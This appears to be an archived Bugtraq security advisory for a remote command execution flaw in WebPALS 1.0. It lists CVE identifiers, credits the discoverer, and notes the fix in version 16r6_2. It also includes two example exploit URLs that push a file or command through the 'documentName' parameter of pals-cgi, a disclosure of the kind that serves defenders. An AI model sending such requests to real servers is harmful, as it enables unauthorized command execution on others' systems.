MnSCU/PALS WebPALS Remote Command Execution Vulnerability

Bugtraq ID:	2372
Class:	Input Validation Error
CVE:	CVE-2001-0216 CVE-2001-0217
Remote:	Yes
Local:	Yes
Published:	Feb 12 2001 12:00AM
Updated:	Jul 11 2009 04:46AM
Credit:	Discovered and posted to Bugtraq by <[email protected]> on Feb 12, 2001
Vulnerable:	MnSCU/PALS WebPALS 1.0
Not Vulnerable:

MnSCU/PALS WebPALS Remote Command Execution Vulnerability

The following example has been provided by <[email protected]>:

http://target/cgi-bin/pals-cgi?palsAction=restart&documentName=url_to_file

http://target/pals-cgi?palsAction=restart&documentName=url_to_command

MnSCU/PALS WebPALS Remote Command Execution Vulnerability

Solution:
MnSCU/PALS has addressed this issue in WebPALS version 16r6_2.

MnSCU/PALS WebPALS Remote Command Execution Vulnerability

References:

• WebPALS Homepage (MnSCU/PALS)